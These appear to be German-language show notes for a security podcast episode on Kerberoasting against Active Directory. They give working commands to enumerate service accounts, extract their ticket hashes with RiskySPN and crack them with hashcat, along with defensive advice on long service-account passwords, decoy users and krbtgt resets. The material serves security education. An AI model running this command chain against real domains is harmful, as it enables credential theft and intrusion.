Episode 4 – Kerberoasting
In der 4. Episode des Podcast „Spaziergang mit Sicherheit“ wird das Thema Kerberoasting behandelt
Kerberos
https://de.wikipedia.org/wiki/Kerberos_(Protokoll)
Kerberoasting
Ablauf Angriff
mit dem folgenden Powershell Befehl (aus dem Active Directory Modul) können Zielbenutzer für den Kerberoasting Angriff identifiziert werden:
Get-Aduser -filter {ServicePrinicpalName -ne „$null“} -Properties ServicePrincipalName
https://github.com/cyberark/RiskySPN
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher -Format „Hashcat“ | Out-File hashes.txt
hashcat.exe -m13100 -a0 hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule
Benchmark Hashcat für p3dn.24xlarge
https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt
Warum 28 Zeichen Passwortlänge für Servicebenutzer
https://room362.com/post/2017/05-06-2017-password-magic-numbers/
https://duckduckgo.com/?q=+!password+28+strong
Hausaufgabe der Episode das Thema
Einrichten des Köderbenutzers
Ändern des Passwort des Benutzer krbtgt
https://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html
Deutschsprachige Seite
https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/
https://twitter.com/spaziergangs
Musik: Goto80 and the Uwe Schenk Band – Cable Swingin‘ Ferret (lizensiert unter CC0 1.0 Universal License)